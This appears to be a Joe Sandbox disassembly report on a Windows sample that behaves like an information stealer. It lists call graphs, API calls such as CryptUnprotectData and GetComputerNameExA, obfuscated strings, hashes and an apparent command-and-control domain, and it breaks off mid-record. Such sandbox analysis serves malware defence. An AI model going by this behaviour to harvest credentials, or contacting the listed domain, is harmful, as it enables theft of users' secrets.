20708 7ed910 LdrInitializeThunk 20707->20708 20774 7f0480 20707->20774 20708->20707 20710 7d6020 20709->20710 20711 7d606e 20710->20711 20787 7ed910 LdrInitializeThunk 20710->20787 20712 7bdcc0 20711->20712 20714 7ebc90 RtlAllocateHeap 20711->20714 20719 7d6340 20712->20719 20716 7d60e1 20714->20716 20715 7ebcb0 RtlFreeHeap 20715->20712 20718 7d614e 20716->20718 20788 7ed910 LdrInitializeThunk 20716->20788 20718->20715 20789 7d6360 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 20719->20789 20721 7d6354 20721->20656 20722 7d6349 20722->20721 20790 7e98a0 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 20722->20790 20724 7d6c18 20725 7f09e0 LdrInitializeThunk 20724->20725 20727 7d6f6f 20724->20727 20730 7d6d75 20724->20730 20731 7d6c2b 20724->20731 20725->20730 20798 7ed910 LdrInitializeThunk 20727->20798 20730->20727 20730->20731 20791 7f0e50 20730->20791 20797 7f0d70 LdrInitializeThunk 20730->20797 20731->20656 20733 7d7d60 20732->20733 20733->20733 20734 7d7d86 RtlExpandEnvironmentStrings 20733->20734 20736 7d7de0 20734->20736 20735 7d7e5b 20735->20658 20736->20735 20737 7d7e38 RtlExpandEnvironmentStrings 20736->20737 20738 7d7e75 20736->20738 20741 7d8120 20736->20741 20737->20735 20737->20738 20737->20741 20738->20735 20738->20741 20743 7d8258 20738->20743 20801 7f0d70 LdrInitializeThunk 20738->20801 20740 7f09e0 LdrInitializeThunk 20740->20743 20741->20740 20741->20741 20742 7f09e0 LdrInitializeThunk 20742->20743 20743->20742 20743->20743 20744->20682 20745->20675 20747 7efba0 20746->20747 20748 7efc0e 20747->20748 20760 7ed910 LdrInitializeThunk 20747->20760 20750 7ebc90 RtlAllocateHeap 20748->20750 20754 7efe08 20748->20754 20751 7efc7a 20750->20751 20755 7efd0e 20751->20755 20761 7ed910 LdrInitializeThunk 20751->20761 20752 7ebcb0 RtlFreeHeap 20752->20754 20754->20681 20755->20752 20755->20755 20757 7efa70 20756->20757 20757->20757 20758 7efb4f 20757->20758 20762 7ed910 LdrInitializeThunk 20757->20762 20758->20681 20760->20748 20761->20755 20762->20758 20763->20694 20764->20688 20766 7ed899 20765->20766 20767 7ed8e5 20765->20767 20769 7ed8e3 20766->20769 20770 7ed8f0 20766->20770 20771 7ed8d0 RtlReAllocateHeap 20766->20771 20773 7ed8a7 20766->20773 20768 7ebc90 RtlAllocateHeap 20767->20768 20768->20769 20769->20707 20772 7ebcb0 RtlFreeHeap 20770->20772 20771->20769 20772->20769 20773->20771 20775 7f048f 20774->20775 20776 7f05ef 20775->20776 20785 7ed910 LdrInitializeThunk 20775->20785 20778 7ebc90 RtlAllocateHeap 20776->20778 20781 7f080f 20776->20781 20779 7f0675 20778->20779 20782 7f074e 20779->20782 20786 7ed910 LdrInitializeThunk 20779->20786 20780 7ebcb0 RtlFreeHeap 20780->20781 20781->20707 20782->20780 20784->20698 20785->20776 20786->20782 20787->20711 20788->20718 20789->20722 20790->20724 20793 7f0e70 20791->20793 20792 7f0f9e 20792->20730 20795 7f0ede 20793->20795 20799 7ed910 LdrInitializeThunk 20793->20799 20795->20792 20800 7ed910 LdrInitializeThunk 20795->20800 20797->20730 20798->20731 20799->20795 20800->20792 20801->20738 20802 7b8640 20806 7b864f 20802->20806 20803 7b88e6 ExitProcess 20804 7b88cf 20813 7ed860 FreeLibrary 20804->20813 20806->20803 20806->20804 20807 7ebc90 RtlAllocateHeap 20806->20807 20808 7b8797 20807->20808 20808->20804 20812 7bc660 CoInitializeEx 20808->20812 20813->20803 20814 7edb42 20815 7edb70 20814->20815 20816 7edbce 20815->20816 20821 7ed910 LdrInitializeThunk 20815->20821 20820 7ed910 LdrInitializeThunk 20816->20820 20819 7edcd1 20820->20819 20821->20816 20822 7d09c0 20823 7d09ce 20822->20823 20825 7d0a20 20822->20825 20826 7d0ae0 20823->20826 20827 7d0af0 20826->20827 20827->20827 20828 7f0ba0 LdrInitializeThunk 20827->20828 20829 7d0bbf 20828->20829 20830 7db842 20831 7db84e FreeLibrary 20830->20831 20834 7db87b 20831->20834 20833 7db90b GetComputerNameExA 20835 7db946 20833->20835 20834->20833 20834->20834 20835->20835 20858 7dc282 20859 7dc28c 20858->20859 20860 7dc34d GetPhysicallyInstalledSystemMemory 20859->20860 20861 7dc390 20860->20861 20861->20861

                                                                                        Executed Functions

                                                                                        Function 007E8860 Relevance: 21.7, APIs: 5, Strings: 7, Instructions: 674memoryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 0 7e8860-7e8889 1 7e8890-7e88c2 0->1 1->1 2 7e88c4-7e88d9 1->2 3 7e88e0-7e8912 2->3 3->3 4 7e8914-7e8954 3->4 5 7e8960-7e8988 4->5 5->5 6 7e898a-7e89a3 5->6 8 7e8a1a-7e8a23 6->8 9 7e89a5-7e89af 6->9 10 7e8a30-7e8a96 8->10 11 7e89b0-7e89c9 9->11 10->10 12 7e8a98-7e8aef 10->12 11->11 13 7e89cb-7e89de 11->13 17 7e8ed5-7e8f01 call 7ef450 GetVolumeInformationW 12->17 18 7e8af5-7e8b29 12->18 14 7e89e0-7e8a0e 13->14 14->14 15 7e8a10-7e8a15 14->15 15->8 23 7e8f0b-7e8f0d 17->23 24 7e8f03-7e8f07 17->24 20 7e8b30-7e8b59 18->20 20->20 22 7e8b5b-7e8b85 SysAllocString 20->22 27 7e8b8b-7e8ba5 CoSetProxyBlanket 22->27 28 7e8ec5-7e8ed1 22->28 26 7e8f1d-7e8f28 23->26 24->23 29 7e8f2a-7e8f31 26->29 30 7e8f34-7e8f46 26->30 31 7e8ebb-7e8ec1 27->31 32 7e8bab-7e8bbb 27->32 28->17 29->30 33 7e8f50-7e8fb0 30->33 31->28 36 7e8bc0-7e8be3 32->36 33->33 34 7e8fb2-7e8fe7 33->34 37 7e8ff0-7e903a 34->37 36->36 38 7e8be5-7e8c65 36->38 37->37 39 7e903c-7e906d call 7cdc90 37->39 42 7e8c70-7e8ca6 38->42 45 7e9070-7e9078 39->45 42->42 44 7e8ca8-7e8cd5 42->44 54 7e8cdb-7e8cfd 44->54 55 7e8ea9-7e8eb9 SysFreeString * 2 44->55 45->45 46 7e907a-7e907c 45->46 48 7e9082-7e9092 call 7b8060 46->48 49 7e8f10-7e8f17 46->49 48->49 49->26 51 7e9097-7e909e 49->51 57 7e8e9f-7e8ea5 54->57 58 7e8d03-7e8d06 54->58 55->31 57->55 58->57 59 7e8d0c-7e8d11 58->59 59->57 60 7e8d17-7e8d62 59->60 62 7e8d70-7e8d99 60->62 62->62 63 7e8d9b-7e8dad 62->63 64 7e8db1-7e8db3 63->64 65 7e8e8e-7e8e9b 64->65 66 7e8db9-7e8dbf 64->66 65->57 66->65 67 7e8dc5-7e8dd3 66->67 68 7e8e0d 67->68 69 7e8dd5-7e8dda 67->69 72 7e8e0f-7e8e4d call 7b7ed0 call 7b8d20 68->72 71 7e8dec-7e8df0 69->71 73 7e8df2-7e8dfb 71->73 74 7e8de0 71->74 83 7e8e4f-7e8e65 72->83 84 7e8e7d-7e8e8a call 7b7ee0 72->84 78 7e8dfd-7e8e00 73->78 79 7e8e02-7e8e06 73->79 77 7e8de1-7e8dea 74->77 77->71 77->72 78->77 79->77 81 7e8e08-7e8e0b 79->81 81->77 83->84 85 7e8e67-7e8e74 83->85 84->65 85->84 87 7e8e76-7e8e79 85->87 87->84
                                                                                        APIs
                                                                                        • SysAllocString.OLEAUT32(k2`0), ref: 007E8B60
                                                                                        • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 007E8B9E
                                                                                        • SysFreeString.OLEAUT32(?), ref: 007E8EB3
                                                                                        • SysFreeString.OLEAUT32(?), ref: 007E8EB9
                                                                                        • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 007E8EFA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID: String$Free$AllocBlanketInformationProxyVolume
                                                                                        • String ID: ,./,$S$]E$]E$b>c<$k2`0$x;
                                                                                        • API String ID: 1773362589-4038474941
                                                                                        • Opcode ID: 1dcae15d8386774f9524710f8d650d52f688fa2c75ea64426fea0246fa5ce20a
                                                                                        • Instruction ID: bd12cefd6a2131e80ba683404985ce6726fc96fcd4d4e5a99b7283733e4f17a5
                                                                                        • Opcode Fuzzy Hash: 1dcae15d8386774f9524710f8d650d52f688fa2c75ea64426fea0246fa5ce20a
                                                                                        • Instruction Fuzzy Hash: C02213B66083419BD310CF29C885B6BBBE1EFC9314F14892DE598DB291DB79D805CB83
                                                                                        Function 007C9362 Relevance: 17.9, APIs: 1, Strings: 9, Instructions: 390encryptionCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 89 7c9362-7c9374 90 7c9380-7c93bb 89->90 90->90 91 7c93bd-7c93c5 90->91 92 7c940a-7c9465 call 7b1a50 91->92 93 7c93c7-7c93d6 91->93 99 7c9470-7c94d2 92->99 95 7c93e0-7c93e7 93->95 97 7c93e9-7c93ec 95->97 98 7c93f0-7c93f6 95->98 97->95 100 7c93ee 97->100 98->92 101 7c93f8-7c9407 call 7ed910 98->101 99->99 103 7c94d4-7c94fb call 7b1d90 99->103 100->92 101->92 107 7c933a 103->107 108 7c9502-7c956f 103->108 109 7c95f2-7c95f4 103->109 112 7c9340-7c9349 call 7b7ee0 107->112 110 7c9570-7c95c7 108->110 111 7c9600-7c9606 109->111 110->110 114 7c95c9-7c95eb call 7b1d90 110->114 111->111 113 7c9608-7c963e 111->113 126 7c934c-7c9351 112->126 116 7c9645-7c9648 113->116 117 7c9640-7c9643 113->117 114->108 114->109 114->112 114->126 127 7c9360 114->127 121 7c964c-7c9658 116->121 117->116 120 7c964a 117->120 120->121 124 7c965f 121->124 125 7c965a-7c965d 121->125 128 7c9660-7c967e call 7b7ed0 124->128 125->124 125->128 126->127 127->89 131 7c9684-7c968b 128->131 132 7c9795-7c97cc call 7ef450 128->132 133 7c96b2-7c96fc call 7cd140 * 2 131->133 135 7c97d1-7c97f4 CryptUnprotectData 132->135 140 7c96fe-7c9719 call 7cd140 133->140 141 7c96a0-7c96ac 133->141 135->108 135->109 140->141 144 7c971b-7c9743 140->144 141->132 141->133 145 7c9749-7c975f call 7cd140 144->145 146 7c9691-7c9695 144->146 149 7c968d 145->149 150 7c9765-7c9790 145->150 146->141 149->146 150->141
                                                                                        APIs
                                                                                          • Part of subcall function 007ED910: LdrInitializeThunk.NTDLL(007F09B8,?,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 007ED93E
                                                                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 007C97EB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID: CryptDataInitializeThunkUnprotect
                                                                                        • String ID: #1!%$'>0=$*8$)$-&64$14'"$?7?0$e$x">*$D$p
                                                                                        • API String ID: 279577407-4262920783
                                                                                        • Opcode ID: 9ca7f7717e99ff0cbd7ea445290fc24ebec8e684a3c59db76597fe5861949e66
                                                                                        • Instruction ID: fc31066db8688b920b02afa104e7dd3c0b613ae39d44ce9c788ad93bd85efcb2
                                                                                        • Opcode Fuzzy Hash: 9ca7f7717e99ff0cbd7ea445290fc24ebec8e684a3c59db76597fe5861949e66
                                                                                        • Instruction Fuzzy Hash: 37C1FC726083818FD768DF28C895BAFB7E2AFD5300F19893CD5D987291DB389905CB42
                                                                                        Function 007D1060 Relevance: 14.3, Strings: 11, Instructions: 575COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 151 7d1060-7d10a8 call 7f09e0 154 7d10ae-7d110e call 7c40f0 call 7ebc90 151->154 155 7d18a3-7d18b3 151->155 160 7d1110-7d1113 154->160 161 7d118b-7d118f 160->161 162 7d1115-7d1189 160->162 163 7d1191-7d1197 161->163 162->160 164 7d1199-7d119e 163->164 165 7d11a3-7d11bc 163->165 166 7d125b-7d125e 164->166 167 7d11be 165->167 168 7d11c3-7d11ce 165->168 171 7d1260 166->171 172 7d1262-7d1267 166->172 169 7d124a-7d124f 167->169 168->169 170 7d11d0-7d1240 call 7ed910 168->170 174 7d1259 169->174 175 7d1251-7d1254 169->175 180 7d1245 170->180 171->172 176 7d178d-7d17c4 call 7ebcb0 172->176 177 7d126d-7d127d 172->177 174->166 175->163 186 7d17c6-7d17c9 176->186 178 7d127f-7d12a1 177->178 181 7d12a8-7d12c7 178->181 182 7d12a3 178->182 180->169 185 7d12c9-7d12cc 181->185 184 7d1467 182->184 191 7d146b-7d146e 184->191 187 7d12ce-7d12f6 185->187 188 7d12f8-7d1316 call 7d18c0 185->188 189 7d17cb-7d183f 186->189 190 7d1841-7d1845 186->190 187->185 188->184 203 7d131c-7d1349 188->203 189->186 193 7d1847-7d184d 190->193 194 7d1476-7d148c call 7ebc90 191->194 195 7d1470-7d1474 191->195 197 7d184f 193->197 198 7d1851-7d1863 193->198 208 7d148e-7d14a2 194->208 209 7d1490-7d149b 194->209 199 7d14a4-7d14a6 195->199 204 7d18a1 197->204 205 7d1865 198->205 206 7d1867-7d186d 198->206 201 7d14ac-7d14cb 199->201 202 7d1764-7d176b 199->202 210 7d14cd-7d14d0 201->210 223 7d176d-7d1775 202->223 224 7d1777-7d177b 202->224 211 7d134b-7d134e 203->211 204->155 213 7d1895-7d1898 205->213 206->213 214 7d186f-7d1891 call 7ed910 206->214 208->199 218 7d177f-7d1783 209->218 219 7d14fa-7d153d 210->219 220 7d14d2-7d14f8 210->220 221 7d1350-7d1391 211->221 222 7d1393-7d13ae call 7d18c0 211->222 216 7d189f 213->216 217 7d189a-7d189d 213->217 214->213 216->204 217->193 218->178 226 7d1789-7d178b 218->226 227 7d153f-7d1542 219->227 220->210 221->211 236 7d13b9-7d13d0 222->236 237 7d13b0-7d13b4 222->237 229 7d177d 223->229 224->229 226->176 232 7d15ba-7d15c0 227->232 233 7d1544-7d15b8 227->233 229->218 235 7d15c4-7d15ca 232->235 233->227 240 7d15cc-7d15d1 235->240 241 7d15d6-7d15f8 235->241 238 7d13d4-7d1465 call 7b7ed0 call 7c3d60 call 7b7ee0 236->238 239 7d13d2 236->239 237->191 238->191 239->238 243 7d16b5-7d16b8 240->243 244 7d15fa-7d15fc 241->244 245 7d1601-7d1613 241->245 249 7d16bc-7d16db 243->249 250 7d16ba 243->250 246 7d169d-7d16a9 244->246 245->246 247 7d1619-7d1693 call 7ed910 245->247 252 7d16ab-7d16ae 246->252 253 7d16b3 246->253 256 7d1698 247->256 255 7d16dd-7d16e0 249->255 250->249 252->235 253->243 258 7d16f9-7d16ff 255->258 259 7d16e2-7d16f7 255->259 256->246 260 7d1735-7d1738 258->260 261 7d1701-7d1705 258->261 259->255 262 7d174d-7d1753 260->262 263 7d173a-7d174b call 7ebcb0 260->263 265 7d1707-7d170e 261->265 267 7d1755-7d1758 262->267 263->267 269 7d171e-7d1727 265->269 270 7d1710-7d171c 265->270 267->202 274 7d175a-7d1762 267->274 271 7d1729 269->271 272 7d172b 269->272 270->265 276 7d1731-7d1733 271->276 272->276 274->218 276->260
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocateHeapInitializeThunk
                                                                                        • String ID: !@$,$0$1$=$?$@$B$T$V$W
                                                                                        • API String ID: 383220839-2565976686
                                                                                        • Opcode ID: 6b0ea20b6c491ae6ce657fffbd63b187480285b00b62916bf20b1ee99f4fd925
                                                                                        • Instruction ID: 809314d4aede22ebd99129ffd7e0417321973d5a2517b016905b3a8c24f4e91a
                                                                                        • Opcode Fuzzy Hash: 6b0ea20b6c491ae6ce657fffbd63b187480285b00b62916bf20b1ee99f4fd925
                                                                                        • Instruction Fuzzy Hash: 7432CE7160C7809FD324CB28C4803AFBBE2ABD5324F59892EE5D587392D6BD9845CB43
                                                                                        Function 007BDE48 Relevance: 12.3, APIs: 1, Strings: 7, Instructions: 339COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 277 7bde48-7bde78 call 7b95a0 CoUninitialize 280 7bde80-7bded4 277->280 280->280 281 7bded6-7bdeef 280->281 282 7bdef0-7bdf25 281->282 282->282 283 7bdf27-7bdf87 282->283 284 7bdf90-7bdfe9 283->284 284->284 285 7bdfeb-7bdffc 284->285 286 7be01b-7be027 285->286 287 7bdffe-7be00f 285->287 288 7be03b-7be045 286->288 289 7be029-7be02a 286->289 290 7be010-7be019 287->290 292 7be05b-7be067 288->292 293 7be047-7be04b 288->293 291 7be030-7be039 289->291 290->286 290->290 291->288 291->291 295 7be07b-7be085 292->295 296 7be069-7be06a 292->296 294 7be050-7be059 293->294 294->292 294->294 298 7be09b-7be0a7 295->298 299 7be087-7be08b 295->299 297 7be070-7be079 296->297 297->295 297->297 301 7be0a9-7be0ab 298->301 302 7be0c1-7be1df 298->302 300 7be090-7be099 299->300 300->298 300->300 304 7be0b0-7be0bd 301->304 303 7be1e0-7be22a 302->303 303->303 305 7be22c-7be248 303->305 304->304 306 7be0bf 304->306 307 7be250-7be27c 305->307 306->302 307->307 308 7be27e-7be2a5 call 7bb4f0 307->308 310 7be2aa-7be2c4 308->310
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID: Uninitialize
                                                                                        • String ID: .a]b$GK8m$LM$T_RE$fancywaxxers.shop$iped$wtf|
                                                                                        • API String ID: 3861434553-2559626107
                                                                                        • Opcode ID: 761d6453ad3705455d531607fcadc25fe800ba8dd564415d68bf3ab52d04712f
                                                                                        • Instruction ID: 2ce0dca22581d620a387b593b156a43844f75372e320a15ce70e2040406daf63
                                                                                        • Opcode Fuzzy Hash: 761d6453ad3705455d531607fcadc25fe800ba8dd564415d68bf3ab52d04712f
                                                                                        • Instruction Fuzzy Hash: 3EB111756493C18BD335CF29C8903EFBBE1ABD7310F18896DD4D94B342C67989068B92
                                                                                        Function 007D29CD Relevance: 9.8, APIs: 2, Strings: 3, Instructions: 1009COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 311 7d29cd-7d29d9 312 7d2a6f-7d2a7f 311->312 313 7d2ad6-7d2ae6 311->313 314 7d2a26-7d2a39 311->314 315 7d29e0-7d29fd 311->315 316 7d2a10-7d2a1f 311->316 317 7d2ad0 311->317 318 7d2a40-7d2a4e 311->318 312->313 312->317 319 7d2a60-7d2a68 312->319 320 7d2aed-7d2b2c call 7ef450 * 2 312->320 321 7d2aae-7d2ab4 312->321 322 7d2b58-7d2b74 312->322 323 7d2a86-7d2a99 312->323 324 7d2e31-7d2e63 call 7ba600 312->324 325 7d2aa0-7d2aab 312->325 326 7d2ac0 312->326 327 7d2b40 312->327 313->320 313->322 313->324 313->327 328 7d2e6a-7d2e7d 313->328 314->312 314->316 314->317 314->318 315->312 315->313 315->314 315->316 315->317 315->318 316->312 316->314 316->316 316->317 316->318 318->312 318->316 318->319 319->312 319->316 320->324 320->327 320->328 345 7d2ebe-7d2ede 320->345 346 7d2ee5-7d2ef7 320->346 347 7d2e90-7d2eab 320->347 348 7d2eb2-7d2eb7 320->348 350 7d2f00-7d2f12 320->350 321->326 329 7d2d9c-7d2db0 322->329 330 7d2dd9-7d2de8 322->330 331 7d2bf7-7d2c07 322->331 332 7d2b91-7d2bb9 322->332 333 7d2bd0-7d2bd8 322->333 334 7d2c10-7d2c1d 322->334 335 7d2c70-7d2c79 322->335 336 7d2d89-7d2d95 322->336 337 7d2c24-7d2c57 322->337 338 7d2bc0 322->338 339 7d2b80-7d2b8a 322->339 340 7d2c60-7d2c68 322->340 341 7d2dc0-7d2dd2 322->341 342 7d2be2-7d2bea 322->342 323->313 323->317 323->319 323->320 323->321 323->322 323->324 323->325 323->326 323->327 323->328 324->328 324->345 324->346 324->347 324->348 324->350 325->321 326->317 349 7d2b48-7d2b51 327->349 328->345 328->346 328->347 328->348 329->330 329->341 352 7d2dff-7d2e09 329->352 353 7d3016-7d301f 329->353 354 7d2def-7d2df6 329->354 355 7d3001-7d3013 329->355 356 7d3020 329->356 357 7d3120-7d3187 329->357 358 7d3022-7d302c 329->358 330->352 330->353 330->354 330->355 330->356 330->357 330->358 331->330 331->334 331->335 331->337 331->339 331->340 331->341 332->330 332->331 332->333 332->334 332->335 332->337 332->338 332->339 332->340 332->341 332->342 333->342 334->330 334->335 334->337 334->339 334->340 334->341 361 7d2c7d-7d2c8a 335->361 336->329 336->330 336->331 336->333 336->334 336->335 336->337 336->338 336->339 336->340 336->341 336->342 336->352 336->353 336->354 336->355 336->356 336->357 336->358 337->340 338->333 339->329 339->330 339->331 339->332 339->333 339->334 339->335 339->336 339->337 339->338 339->339 339->340 339->341 339->342 340->361 341->330 341->352 341->353 341->354 341->355 341->356 341->357 341->358 342->331 345->346 345->347 345->348 346->327 346->349 346->350 351 7d2e22-7d2e2a 346->351 347->345 347->346 347->348 348->345 348->347 349->322 349->327 349->346 349->349 349->351 364 7d2f20-7d2f8a 350->364 351->324 351->327 351->328 351->345 351->346 351->347 351->348 351->350 352->353 353->356 354->352 355->353 367 7d3190-7d31be 357->367 362 7d2c90-7d2cfe 361->362 362->362 369 7d2d00-7d2d10 362->369 364->364 370 7d2f8c-7d2f97 364->370 367->367 374 7d31c0-7d3208 RtlExpandEnvironmentStrings 367->374 369->339 376 7d2d16-7d2d25 369->376 377 7d2f9d-7d2fa9 370->377 378 7d2e10-7d2e1b 370->378 379 7d3210-7d325f 374->379 380 7d2d30-7d2d37 376->380 381 7d2fb0-7d2fb7 377->381 378->327 378->349 378->351 379->379 382 7d3261-7d326e 379->382 383 7d2d39-7d2d3c 380->383 384 7d2d43-7d2d49 380->384 385 7d2fb9-7d2fbc 381->385 386 7d2fc3-7d2fc9 381->386 387 7d32dc-7d332b call 7b7ed0 382->387 388 7d32bc-7d32c2 call 7b7ee0 382->388 389 7d342f-7d3441 382->389 390 7d3448-7d34f4 call 7b7ed0 382->390 391 7d3275-7d32ad call 7b7ed0 RtlExpandEnvironmentStrings 382->391 392 7d32c5-7d32ca 382->392 393 7d32b4 382->393 394 7d35c6 382->394 395 7d35b6-7d35be 382->395 396 7d35e1-7d366e 382->396 397 7d32d2-7d32db 382->397 383->380 399 7d2d3e 383->399 384->339 401 7d2d4f-7d2d82 call 7ed910 384->401 385->381 403 7d2fbe 385->403 386->378 404 7d2fcf-7d2ff6 call 7ed910 386->404 437 7d3330-7d33ad 387->437 388->392 389->388 389->390 389->392 389->394 389->395 389->396 389->397 400 7d32d0 389->400 406 7d35db 389->406 407 7d37ba-7d37c2 call 7b7ee0 389->407 408 7d37b4 389->408 409 7d35cc-7d35d2 call 